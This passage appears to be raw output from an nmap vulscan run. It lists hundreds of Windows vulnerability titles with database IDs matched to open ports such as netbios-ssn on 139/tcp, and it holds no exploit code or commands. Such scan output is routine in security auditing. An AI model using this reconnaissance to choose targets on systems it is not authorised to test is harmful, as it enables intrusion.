Administration Registry Key Permission Weakness [13477] Microsoft Windows Java Applet UDP Socket Exhaustion DoS [13476] Microsoft Windows Media Player asx Parser Multiple Tag Overflow [13475] Microsoft Windows 2000 Telnet Service Predictable Named Pipe Arbitrary Command Execution Variant [13474] Microsoft Windows 2000 Telnet Service Predictable Named Pipe Arbitrary Command Execution [13441] Microsoft Windows 2000 Security Interface Change Password Option Account Enumeration [13440] Microsoft Windows XP Hot Keys Screen Lock Bypass [13438] Microsoft Windows CONVERT.EXE FAT32 File Permission Conversion Failure [13437] Microsoft Windows 2000 Debug Register Local Privilege Escalation [13435] Microsoft Windows XP Port 445 Malformed SYN Packet DoS [13434] Microsoft Windows Distributed Transaction Coordinator (DTC) Malformed Input DoS [13424] Microsoft Windows 2000 Current Password Change Policy Bypass [13423] Microsoft Windows 2000 Terminal Server SYSVOL Share Connection Saturation Restriction Bypass [13422] Microsoft Windows PPTP Service Malformed Control Data Overflow [13421] Microsoft Windows XP RDP Malformed PDU Confirm Active Packet DoS [13420] Microsoft Windows NTFS Hard Link Audit Bypass [13419] Microsoft Windows Media Player Active Playlist Arbitrary HTML Script Execution [13416] Microsoft Windows NetDDE Agent WM_COPYDATA Message Arbitrary Code Execution (shatter) [13415] Microsoft Windows 2000 System Root Folder Search Path Permission Weakness [13413] Microsoft Windows XP Windows Shell Function .mp3/.wma Custom Attribute Overflow [13411] Microsoft Windows XP Redirector Function Long Parameter Overflow [13410] Microsoft Windows 2000 Accessibility Utility Manager Arbitrary Code Execution [13409] Microsoft Windows XP EXPLORER.EXE desktop.ini .ShellClassInfo Parameter Overflow [13408] Microsoft Windows SHELL32.DLL ShellExecute API Function Overflow [13389] Microsoft Windows DirectX QUARTZ.DLL Multiple Field .mid File Overflows [13330] Microsoft Windows HKLM Registry Key Locking DoS [12842] Microsoft Windows Cursor and Icon Validation Code Execution [12840] Microsoft Windows HTML Help Related Topics Arbitrary Command Execution [12832] Microsoft Windows Indexing Service Query Overflow [12655] Microsoft Windows Active Directory LSASS.EXE DoS [12625] Microsoft Windows winhlp32.exe Overflow [12624] Microsoft Windows Kernel ANI File Parsing DoS [12623] Microsoft Windows LoadImage API Overflow [12511] Microsoft Windows Media Player ActiveX Control setItemInfo() / getItemInfo() Arbitrary WMA File Manipulation [12510] Microsoft Windows Media Player ActiveX Control getItemInfoByAtom() Function File Information Disclosure [12507] Microsoft Windows XP SP2 Popup Blocker Bypass [12482] Microsoft Windows XP Dial-Up Access Firewall Disable [12378] Microsoft Windows WINS Association Context Validation Remote Code Execution [12377] Microsoft Windows NT DHCP Message Length Remote Overflow [12376] Microsoft Windows LSASS Identity Token Validation Local Privilege Escalation [12374] Microsoft Windows HyperTerminal Session File Remote Overflow [12372] Microsoft Windows Kernel Application Launch Local Privilege Escalation [12371] Microsoft Windows NT Malformed DHCP Packet Remote Overflow DoS [12370] Microsoft Windows WINS Computer Name Validation Remote Code Execution [12123] Microsoft Windows ipconfig.exe Overflow [12001] Microsoft Windows XP SP2 File Download Warning Bypass [12000] Microsoft Windows XP SP2 Unspecified Local Zone Access [11999] Microsoft Windows XP SP2 Unspecified Remote File Access [11936] Microsoft Windows shlwapi.dll Malformed HTML Tag Handling Null Pointer DoS [11917] Microsoft Windows XP SP2 Spoofed Content-Location Warning Bypass [11801] Microsoft Windows Small Buffer Length SMB Packet Overflow [11799] Microsoft Windows SMB Signing Group Policy Modification [11750] Microsoft Windows 2000 Message Queue Manager Queue Registration Request Overflow DoS [11479] Microsoft Windows NT Double Dot Samba Client DoS [11478] Microsoft Windows NT Malformed SMB Logon Request DoS [11477] Microsoft Windows NT LSASS.EXE Access Violation DoS [11476] Microsoft Windows NT DebugActiveProcess Function Privilege Escalation [11475] Microsoft Windows NT NtOpenProcessToken Permission Failure [11474] Microsoft Windows NT CSRSS Thread Exhaustion DoS [11473] Microsoft Windows NT Messenger Service Long Username DoS [11472] Microsoft Windows NT DNS Server Malformed Response DoS [11471] Microsoft Windows NT DNS Server Character Saturation DoS [11470] Microsoft Windows NT Help File Utility Overflow [11469] Microsoft Windows NT Malformed File Image Header DoS [11468] Microsoft Windows NT IOCTL Function DoS [11463] Microsoft Windows Authenticode ActiveX Install Failure Remote Code Execution [11462] Microsoft Windows HSC PCHealth System HCP URL Query Overflow [11461] Microsoft Windows Workstation Service WKSSVC.DLL Logging Function Remote Overflow [11453] Microsoft Windows 98 Malformed oshare Packet DoS [11264] Microsoft Windows NT SCM Malformed Resource Enumeration Request DoS [11259] Microsoft Windows NT Domain User Login System Policy Download Failure [11162] Microsoft Windows 95 .pwl File Weak Password Encryption [11161] Microsoft Windows 95 NetWare Remote Administration Hidden File Share [11158] Microsoft Windows NT Malformed Token Ring DoS [11156] Microsoft Windows NT tcpip.sys Malformed ICMP Request DoS [11096] Microsoft Windows ntconfig.pol Write Failure Access Restriction Bypass [11095] Microsoft Windows NT Ntconfig.pol Long Server Name Access Restriction Bypass [11094] Microsoft Windows NT User Mode Application Handle Closing DoS [11053] Microsoft Windows XP Explorer WAV Parsing DoS [11011] Microsoft Windows NT Netbt.sys Malformed DNS Response DoS [10999] Microsoft Windows Troubleshooter ActiveX Control Tshoot.ocx Arbitrary Code Execution [10997] Microsoft Windows Media Player ActiveX Control Unauthorized Media Library Manipulation [10975] Microsoft Windows NT Winpopup Long Username DoS [10938] Microsoft Windows User32.dll ComboBox CB_DIR Message Local Overflow [10937] Microsoft Windows User32.dll ListBox LB_DIR Message Local Overflow [10936] Microsoft Windows Messenger Service Message Length Remote Overflow [10908] Microsoft Windows XP SP2 ZIP Wizard ZoneID Tracking Failure [10854] Microsoft Windows XP Zip Manager zipfldr.dll Overflow DoS [10699] Microsoft Windows Program Group Converter Arbitrary Code Execution [10698] Microsoft Windows Shell Application Start Arbitrary Code Execution [10697] Microsoft Windows/Exchange NNTP Component Remote Overflow [10696] Microsoft Windows/Exchange SMTP DNS Lookup Overflow [10695] Microsoft Windows Compressed Folders DUNZIP32.DLL File Handling Overflow [10693] Microsoft Windows Unspecified Kernel Local DoS [10692] Microsoft Windows Metafile Image Format Arbitrary Code Execution [10691] Microsoft Windows Virtual DOS Machine Subsystem Local Privilege Escalation [10690] Microsoft Windows Management APIs Local Privilege Escalation [10689] Microsoft Windows NetDDE Remote Overflow [10688] Microsoft Windows WebDAV XML Message Handler Malformed Request DoS [10648] Microsoft Windows NT Default SNMP Registry Key Permission Weakness Local Privilege Escalation [10647] Microsoft Windows CIFS Browser Protocol Arbitrary NetBIOS Cache Entry Modification [10634] Microsoft Windows 95/98 Spoofed ARP Packet Cache Manipulation [10633] Microsoft Windows 2000 Protected Store Weak Encryption Default [10618] Microsoft Windows NT autorun.inf Arbitrary Command Execution [10616] Microsoft Windows NT Fragmented IP Packet Firewall Restriction Bypass [10615] Microsoft Windows NT linux smbmount Request DoS [10614] Microsoft Windows NT %systemroot% Path Inclusion [10609] Microsoft Windows WINS Malformed Packet Consumption DoS [10608] Microsoft Windows TCP/IP Last Sequence Forced RST DoS [10607] Microsoft Windows ICMP Redirect Spoofing DoS [10606] Microsoft Windows LSA NULL Policy Handle DoS [10604] Microsoft Windows NT PATH Working Directory Inclusion [10456] Microsoft Windows IPv6 Packet Fragmentation Handling DoS [10247] Microsoft Windows SMTP Service NTLM Null Session Mail Relay [10230] Microsoft Windows XP SP2 File/Print Share Restriction Bypass [9722] Microsoft Windows NT System Critical Registry Key Contain Bad Value [9579] Microsoft Windows NT GetThreadContext/SetThreadContext Kernel Mode Address DoS [9530] Microsoft Windows CRL File Digital Signature Verification Failure [9386] Microsoft Windows 2000 msinfo32.exe msinfo_file Variable Overflow [9359] Microsoft Windows Page File pagefile.sys Information Disclosure [9358] Microsoft Windows NT Event Log Inappropriate Permissions [9356] Microsoft Windows NT HKEY_CLASSES_ROOT Key Inappropriate System-Critical Permissions [9355] Microsoft Windows NT HKEY_LOCAL_MACHINE Key Inappropriate System-Critical Permissions [9349] Microsoft Windows NT Systems User Audit Policy Logging Weakness [9348] Microsoft Windows NT Non-NTFS File System Insecure [9152] Microsoft Windows XP SP2 Zone Identifier Object Value Warning Failure [9141] Microsoft Windows File Icon Spoofing [9140] Microsoft Windows XP Content-Location Local Computer Zone Bypass [9012] Microsoft Windows XP Internet Connection Firewall Bypass [8368] Microsoft Windows XP/2003 Login Screen Consumption DoS [8334] Microsoft Windows NT \?? Object Folder Symlink Privilege Escalation [8161] Microsoft Windows NT Invalid User Privileges [8160] Microsoft Windows NT File/Directory Invalid Permissions [8112] Microsoft Windows NT Weak Account Password Policy [8051] Microsoft Windows Networking Software Long Filename Handling Arbitrary Command Execution [7904] Microsoft Windows Media Player ActiveX File Existence Disclosure [7891] Microsoft Windows IE window.moveBy Function Pointer Hijack (HijackClickV2) [7855] Microsoft IE on Windows ME Javascript Cookie Set Bypass [7804] Microsoft Windows HTML Help Arbitrary Code Execution [7803] Microsoft Windows showHelp Arbitrary Code Execution [7800] Microsoft Windows POSIX Subsystem Privilege Escalation [7798] Microsoft Windows Task Scheduler Remote Overflow [7777] Microsoft Windows Media Control Preview Script Execution [7738] Microsoft Windows Media Player Skins File Arbitrary Command Execution [7576] Microsoft Windows NT RSHSVC .Rhosts Unauthorized Access [7182] Microsoft Windows Media Unicast Service Severed Connection Memory Leak DoS [7179] Microsoft Windows 2000 Event Viewer Snap-in Overflow [7178] Microsoft Windows Media Player WMP ActiveX Control Javascript Command Execution [6790] Microsoft Windows NT AEDebug Registry Key Weak Permissions [6515] Microsoft Windows 2000 Domain Expired Account Authentication [6221] Microsoft Windows XP desktop.ini CLSID Arbitrary Command Execution [6074] Microsoft Windows Me HSC hcp:// URL XSS [6053] Microsoft Windows Help and Support Center HCP URL Code Execution [5968] Microsoft Windows ARP Packet DoS [5966] Microsoft Windows NT SMB Traversal Arbitrary File Access [5858] Microsoft Windows NT Rshsvc.exe Arbitrary Command Execution [5687] Microsoft Windows IE and Explorer Share Name Overflow [5686] Microsoft Windows Telnet Service Account Information Disclosure [5558] Microsoft Windows Media Player Advanced Streaming Format Overflow [5313] Microsoft Windows Media Device Manager Invalid Local Storage Device Privilege Escalation [5312] Microsoft Windows Media Player .wma IE Cache Arbitrary Code Execution [5261] Microsoft Windows ASN.1 Double Free Code Execution [5260] Microsoft Windows SSL Library Malformed Message Remote DoS [5259] Microsoft Windows Negotiate SSP Code Execution [5258] Microsoft Windows Virtual DOS Machine Privilege Escalation [5257] Microsoft Windows Local Descriptor Table Privilege Escalation [5256] Microsoft Windows Unspecified H.323 Code Execution [5255] Microsoft Windows Management Privilege Escalation [5254] Microsoft Windows Utility Manager Privilege Escalation [5253] Microsoft Windows Help and Support Center Command Execution [5252] Microsoft Windows Metafile Code Execution [5251] Microsoft Windows Winlogon Command Execution [5250] Microsoft Windows SSL Library Private Communications Transport (PCT) Remote Overflow [5249] Microsoft Windows LDAP Crafted Request Remote DoS [5248] Microsoft Windows LSASS Remote Overflow [5179] Microsoft Windows 2000 microsoft-ds DoS [4877] Microsoft Windows Terminal Services Kerberos Double Authorization Data Entry [4467] Microsoft Windows WebDav ntdll.dll Remote Overflow [4170] Microsoft Windows 2000 Server Media Services TCP Packet Handling Remote DoS [3903] Microsoft Windows WINS Server Remote Overflow [3902] Microsoft Windows ASN.1 Library Integer Overflow [3711] Microsoft Windows XP Malicious Folder Automatic Code Execution [3111] Microsoft IE Windows Scripting Host (WSH) GetObject Javascript Function Arbitrary File Access [3106] Microsoft Windows Password Authentication Security Point of Failure [3067] Microsoft Windows Media Player ASF File Arbitrary Code Execution [2960] Microsoft Windows Messenger Service Social Engineering Weakness [2705] Microsoft Windows 2000 Windows Troubleshooter ActiveX Overflow [2692] Microsoft Windows Design Tools MDT2DD.DLL COM Object Memory Corruption Command Execution [2678] Microsoft Windows Overflow in ListBox and [2677] Microsoft Windows Arbitrary ActiveX Control Installation [2675] Microsoft Windows HCP protocol Overflow [2657] Microsoft Windows Message Queuing Service Heap Overflow [2655] Microsoft Windows Server 2003 Shell Folders Arbitrary File Access [2642] Microsoft Windows Unauthorised Thread Termination [2571] Microsoft Windows TCP Packet URG Value Information Disclosure [2540] Microsoft Windows 2003 Server Buffer Overflow Protection Mechanism Bypass [2507] Microsoft Windows NetBIOS Random Memory Content Disclosure [2328] Microsoft Windows NT 4.0 with IBM JVM DoS [2262] Microsoft Windows Media Player DHTML Local Zone Access [2247] Microsoft Windows Media Services Remote Command Execution #2 [2244] Microsoft Windows 2000 ShellExecute() API Let [2237] Microsoft Windows 2000 Active Directory Lsass.exe Overflow [2074] Microsoft Windows Server Message Block (SMB) Protocol SMB_COM_TRANSACTION Packet Remote Overflow DoS [2073] Microsoft Windows XP Network Share Provider Overflow [2072] Microsoft Windows Network Connection Manager Privilege Elevation [2051] Microsoft Windows User Shell Buffer Overflow [2037] Microsoft Windows Trusted Domain SID Remote Privilege Escalation [1990] Microsoft Windows Terminal Services False IP Address [1975] Microsoft Windows Terminal Server Service RDP Remote DoS [1928] Microsoft Windows NNTP Malformed Post DoS [1915] Microsoft Windows Media Player .NSC File Overflow [1912] Microsoft Windows Terminal Server Malformed RDP DoS [1861] Microsoft Windows Telnet Local System Call DoS [1860] Microsoft Windows Telnet Service Handle Leak DoS [1859] Microsoft Windows Telnet Multiple Sessions DoS [1858] Microsoft Windows Telnet Service Logon Backspace DoS [1840] Microsoft Windows Media Player Internet Shortcut Execution [1764] Microsoft Windows 2000 Domain Controller DoS [1758] Microsoft Windows 2000 Network DDE Escalated Privileges [1755] Microsoft Windows 2000 RDP Malformed Packet Handling Remote DoS [1735] Microsoft Windows NT SNMP WINS Database Deletion Remote DoS [1725] Microsoft Windows Media Player .WMZ Arbitrary Java Applet Execution [1672] Microsoft Windows 2000 Telnet Session Timeout DoS [1658] Microsoft Windows Media Player .ASX File Handling Overflow [1656] Microsoft Windows Media Player .WMS Arbitrary Script Execution [1639] Microsoft Windows NT Terminal Server RegAPI.DLL Username Overflow [1633] Microsoft Windows 2000 System Monitor ActiveX LogFileName Parameter Validation Overflow [1621] Microsoft Indexing Services for Windows 2000 .htw XSS [1607] Microsoft Windows 9x Invalid Driver Type DoS [1599] Microsoft Windows 9x / Me IPX NMPI Packet DoS [1591] Microsoft Windows 2000 OEMPreinstall Installation Permission Weakness [1578] Microsoft Windows 2000 Simplified Chinese IME Local Privilege Escalation [1571] Microsoft Windows Media Player Malformed Embedded OCX Control DoS [1563] Microsoft Windows / Office DLL Search Path Weakness [1546] Microsoft Windows Media Unicast Service Malformed Request DoS [1491] Microsoft Windows 9x IPX Ping Packet DoS [1437] Microsoft Windows 2000 Telnet Server Binary Zero Parsing Remote DoS [1399] Microsoft Windows 2000 Windows Station Access [1358] Microsoft Windows NT HostAnnouncement DoS [1308] Microsoft Windows NetBIOS NULL Source Name DoS [1297] Microsoft Windows 2000 Active Directory Object Attribute [1292] Microsoft Windows NT 4.0 / 2000 cmd.exe Buffer Overflow [1268] Microsoft Windows TCP/IP Printing Service DoS [1257] Microsoft Windows Media License Manager DoS [1251] Microsoft Windows MS DOS Device Name DoS [1226] Microsoft Windows Media Server Malformed Handshake Sequence DoS [1214] Microsoft Windows NT Recycle Bin Deleted File Access [1199] Microsoft Windows NT NtImpersonateClientOfPort LPC Privilege Escalation [1166] Microsoft Windows NT LsaLookupSids() DoS [1161] Microsoft Windows Help System File Manipulation Local Privilege Escalation [1146] Microsoft Windows 9x Credential Cache Cleartext Password Disclosure [1135] Microsoft Windows NT Print Spooler Service (spoolss.exe) AddPrintProvider() Function Alternate Print Provider Arbitrary Command Execution [1134] Microsoft Windows NT Print Spooler Malformed Request Overflow [1076] Microsoft Windows IP Source Routing [1075] Microsoft Windows NT RASMAN Path Subversion Privilege Escalation [1046] Microsoft Windows telnet.exe Argument Overflow [1022] Microsoft Windows Invalid IGMP Header Handling Remote DoS [1013] Microsoft Windows NT Screensaver Context Local Privilege Escalation [1010] Microsoft Windows NT Malformed LSA Request DoS [967] Microsoft Windows NT WINS Service Malformed Data DoS [945] Microsoft Windows 95/98 SMB Authentication Replay [943] Microsoft Windows NT SP4 Null NT Hash Value Share Access [931] Microsoft Windows NT GINA Arbitrary Clipboard Content Disclosure [868] Microsoft Windows Compressed Folders ZIP Decompression Arbitrary File Write [867] Microsoft Windows Compiled HTML Help (.chm) Arbitrary Command Execution [864] Microsoft Windows Certificate Enrollment ActiveX Arbitrary Certificate Deletion [858] Microsoft Windows NCM Handler Local Privilege Elevation [837] Microsoft Windows RAS Phonebook dial-up String Overflow [788] Microsoft Windows smss.exe Handle Duplication Local Privilege Escalation [773] Microsoft Windows 2000 Group Policy File Lock DoS [772] Microsoft Windows Multiple UNC Provider Request Overflow [736] Microsoft Windows SMB Enumeration Information Disclosure [732] Microsoft Windows SMTP Service Malformed BDAT Request Remote DoS [715] Microsoft Windows NT LsaQueryInformationPolicy Function NULL Session Domain SID Enumeration [714] Microsoft Windows NT LsaQueryInformationPolicy() Function SID User Account Disclosure [697] Microsoft Windows Universal Plug and Play NOTIFY DoS [692] Microsoft Windows Universal Plug and Play NOTIFY Overflow [665] Microsoft Windows 95 Online Registration Information Disclosure [608] Microsoft Windows IrDa Driver Malformed Packet Remote Overflow DoS [581] Microsoft Windows SMTP Incorrect Credentials Authentication Bypass [572] Microsoft Windows NT NTLMSSP Crafted LPC Request Local Privilege Escalation [515] Microsoft Windows 2000 LDAP Server Arbitrary User Password Modification [511] Microsoft Windows Malformed PPTP Packet Stream Remote DoS [499] Microsoft Windows NT Winsock2ProtocolCatalogMutex Mutex Local DoS [466] Microsoft Windows NT RAS Administration Registry Key Permission Weakness Local Privilege Escalation [454] Microsoft Windows 2000 NTLM Domain Account Lockout Policy Bypass [445] Microsoft Windows LAN Manager SNMP LanMan Information Disclosure [424] Microsoft Windows NT Malformed LPC Request Remote DoS [423] Microsoft Windows File Share Password Protection Bypass [418] Microsoft Windows telnet.exe NTLM Authentication Information Disclosure [403] Microsoft Windows 2000 Still Image Service WM_USER Message Local Overflow [385] Microsoft Windows Shell Executable (Explorer.exe) Registry Relative Path Privilege Escalation [336] Microsoft Windows CIFS Computer Browser ResetBrowser Frame DoS [335] Microsoft Windows Fragmented IP Packet Saturation DoS (jolt2) [334] Microsoft Windows Registry: Permission to Modify Common Paths [332] Microsoft Windows Registry Key Permission Weakness Admin Privilege Escalation [331] Microsoft Windows Remote Registry Access [316] Microsoft Windows NT Remote Registry Server WinLogon.exe Malformed Request Local DoS [304] Microsoft Windows NT service pack level via remote registry access [303] Microsoft Windows NetBIOS Null Session Remote Registry Access [300] Microsoft Windows SMB LanMan Pipe Server Listing Disclosure [299] Microsoft Windows NetBIOS Shares Access Control Weakness [297] Microsoft Windows Installation ADMIN$ Share Arbitrary Access [218] Microsoft Windows Multiple TCP/IP Stack Malformed Ping DoS [129] Microsoft Windows NT FTP 'guest' Account
139	tcp	open	netbios-ssn	syn-ack	Microsoft Windows netbios-ssn
	vulscan	VulDB - https://vuldb.com: [176522] Microsoft Windows 7 SP1 up to Server 2019 MSHTML Platform unknown vulnerability [176520] Microsoft Windows 10 20H2 up to Server 2004 DWM Core Library unknown vulnerability [176515] Microsoft Windows 10 up to Server 2019 Hyper-V denial of service [176514] Microsoft Windows 8.1 up to Server 2019 Server for NFS information disclosure [176513] Microsoft Windows 8.1 up to Server 2019 Server for NFS information disclosure [176512] Microsoft Windows 8.1 up to Server 2019 NFS denial of service [176511] Microsoft Windows 7 SP1 up to Server 2019 GPSVC unknown vulnerability [176510] Microsoft Windows 7 SP1 up to Server 2019 Event Tracing information disclosure [176509] Microsoft Windows 7 SP1 up to Server 2019 HTML Platform unknown vulnerability [176508] Microsoft Windows 8.1 up to Server 2019 TCP/IP Driver denial of service [176507] Microsoft Windows 10 20H2 up to Server 2019 Cloud Files Mini Filter Driver unknown vulnerability [176506] Microsoft Windows 7 SP1 up to Server 2019 Remote Desktop Services denial of service [176500] Microsoft Windows 7 SP1 up to Server 2019 Kerberos AppContainer unknown vulnerability [176499] Microsoft Windows 10 20H2/10 21H1/10 2004/Server 20H2/Server 2004 Bind Filter Driver information disclosure [176498] Microsoft Windows 7 SP1 up to Server 2019 Scripting Engine unknown vulnerability [176497] Microsoft Windows 7 SP1 up to Server 2019 NTLM unknown vulnerability [176495] Microsoft Windows 7 SP1 up to Server 2019 NTFS unknown vulnerability [176494] Microsoft Windows 10 20H2 up to Server 2004 Kernel information disclosure [176493] Microsoft Windows 7 SP1 up to Server 2019 Common Log File System Driver unknown vulnerability [176492] Microsoft Windows 7 SP1 up to Server 2019 Filter Manager unknown vulnerability [176491] Microsoft Windows 10 20H2 up to Server 2019 Kernel-Mode Driver unknown vulnerability [176490] Microsoft Windows 10 20H2 up to Server 2019 Kernel unknown vulnerability [176477] Microsoft Windows 7 SP1 up to Server 2019 Enhanced Cryptographic Provider unknown vulnerability [176474] Microsoft Windows 7 SP1 up to Server 2019 DCOM Server unknown vulnerability [174874] Microsoft Windows 7 SP1 up to Server 2019 Wireless Networking unknown vulnerability [174873] Microsoft Windows 7 SP1 up to Server 2019 Wireless Networking information disclosure [174871] Microsoft Windows 7 SP1 up to Server 2019 Wireless Networking unknown vulnerability [174870] Microsoft Windows 7 SP1 up to Server 2019 unknown vulnerability [174868] Microsoft Windows 8.1 up to Server 2019 CSC Service information disclosure [174866] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174865] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 HTTP Protocol Stack unknown vulnerability [174864] Microsoft Windows 10 20H2 up to Server 2019 Container Manager Service unknown vulnerability [174863] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174862] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174861] Microsoft Windows 10 20H2 up to Server 2019 Graphics unknown vulnerability [174849] Microsoft Windows 7 SP1 up to Server 2019 Bluetooth Driver unknown vulnerability [174848] Microsoft Windows 7 SP1 up to Server 2019 Infrared Data Association information disclosure [174847] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Desktop Bridge denial of service [174846] Microsoft Windows 7 SP1 up to Server 2019 RDP information disclosure [174845] Microsoft Windows 10 20H2 up to 10 2004 WalletService unknown vulnerability [174844] Microsoft Windows 7 SP1 up to Server 2019 Graphics unknown vulnerability [174843] Microsoft Windows 10 1809/Server 2019 Container Isolation FS Filter Driver unknown vulnerability [174842] Microsoft Windows 10 20H2 up to Server 2019 Projected File System FS Filter Driver information disclosure [174841] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Media Foundation Core unknown vulnerability [174840] Microsoft Windows 7 SP1 up to Server 2019 on SSDP Service unknown vulnerability [174839] Microsoft Windows 7 SP1 up to Server 2019 OLE Automation unknown vulnerability [174835] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 SMB Client Security Feature unknown vulnerability [174824] Microsoft Windows 7 SP1 up to Server 2019 Hyper-V VmsIfrInfoParams_OID_SWITCH_NIC_REQUEST unknown vulnerability [172949] Microsoft Windows 10 up to Server 2019 Media Photo Codec information disclosure [172947] Microsoft Windows 7 SP1 up to Server 2019 Internet Messaging API unknown vulnerability [172941] Microsoft Windows 7 SP1 up to Server 2019 Media Video Decoder unknown vulnerability [172937] Microsoft Windows 10 20H2 up to Server 2019 Hyper-V denial of service [172933] Microsoft Windows 10 20H2 up to Server 2019 Application Compatibility Cache denial of service [172929] Microsoft Windows 7 SP1 up to Server 2019 Media Video Decoder unknown vulnerability [172925] Microsoft Windows 10 20H2 up to Server 2019 TCP/IP Driver denial of service [172921] Microsoft Windows 7 SP1 up to Server 2019 DNS information disclosure [172920] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 SMB information disclosure [172919] Microsoft Windows 8.1 up to Server 2019 SMB information disclosure [172917] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172916] Microsoft Windows 7 SP1 up to Server 2019 DNS information disclosure [172915] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172914] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172913] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172912] Microsoft Windows 7 SP1 up to Server 2019 on Remote Procedure Call Runtime unknown vulnerability [172911] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172910] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172909] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172908] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172907] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172906] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172905] Microsoft Windows 7 SP1 up to Server 2019 on Remote Procedure Call Runtime unknown vulnerability [172904] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172903] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172902] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172901] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172900] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172899] Microsoft Windows 8.1 up to Server 2019 Remote Procedure Call Runtime Remote unknown vulnerability [172898] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172896] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [172895] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [172894] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [172892] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172891] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172890] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172889] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172888] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172887] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172886] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172885] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172880] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP Driver denial of service [172877] Microsoft Windows 10 20H2 up to Server 2019 TCP/IP information disclosure [172875] Microsoft Windows 8.1 up to Server 2019 Hyper-V unknown vulnerability [172874] Microsoft Windows 7 SP1 up to Server 2019 Network File System unknown vulnerability [171012] Microsoft Windows 10 20H2 up to Server 2019 NAT denial of service [171009] Microsoft Windows 10 20H2 up to Server 2004 Hyper-V unknown vulnerability [171000] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170999] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170998] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170997] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170996] Microsoft Windows Server 20H2 up to Server 2019 DNS Server code injection [170995] Microsoft Windows Server 20H2 up to Server 2019 DNS Server denial of service [170994] Microsoft Windows Server 20H2 up to Server 2019 DNS Server denial of service [170990] Microsoft Windows Admin Center unknown vulnerability [170981] Microsoft Windows 7 SP1 up to Server 2019 Remote Access API privileges management [170979] Microsoft Windows 10 20H2 up to Server 2019 OpenType Font Parser code injection [170978] Microsoft Windows 7 SP1 up to Server 2019 Media Foundation unknown vulnerability [170907] Microsoft Windows 10 20H2 up to Server 2019 Application Virtualization code injection [170436] Microsoft Windows 8.1 up to Server 2019 Extended Protection for Authentication improper authentication [169530] Microsoft Windows 7 SP1 up to Server 2019 Trust Verification API denial of service [169529] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP unknown vulnerability [169528] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP unknown vulnerability [169527] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP denial of service [169526] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call information disclosure [169525] Microsoft Windows 7 SP1 up to Server 2019 Local Spooler unknown vulnerability [169524] Microsoft Windows 10 20H2 up to Server 2019 Microsoft.PowerShell.Utility Module protection mechanism [169521] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Network File System denial of service [169509] Microsoft Windows 7 SP1 up to Server 2019 Address Book unknown vulnerability [169502] Microsoft Windows 7 SP1 up to Server 2019 Fax Service unknown vulnerability [169501] Microsoft Windows 7 SP1 up to Server 2019 Fax Service unknown vulnerability [169499] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [169498] Microsoft Windows 10 up to Server 2019 unknown vulnerability [169497] Microsoft Windows 10 Version 1809 for 32-bit Systems Codecs Library unknown vulnerability [169487] Microsoft Windows 10 up to Server 2019 Graphics unknown vulnerability [167703] Microsoft Windows 7 SP1 up to Server 2019 Update Stack privileges management [167700] Microsoft Windows 10 up to Server 2019 RDP authorization [167699] Microsoft Windows 7 SP1 up to Server 2019 RDP Core unknown vulnerability [167687] Microsoft Windows 7 SP1 up to Server 2019 Graphics information disclosure [167686] Microsoft Windows 7 SP1 up to Server 2019 GDI+ information disclosure [167685] Microsoft Windows 7 SP1 up to Server 2019 Fax Compose Form 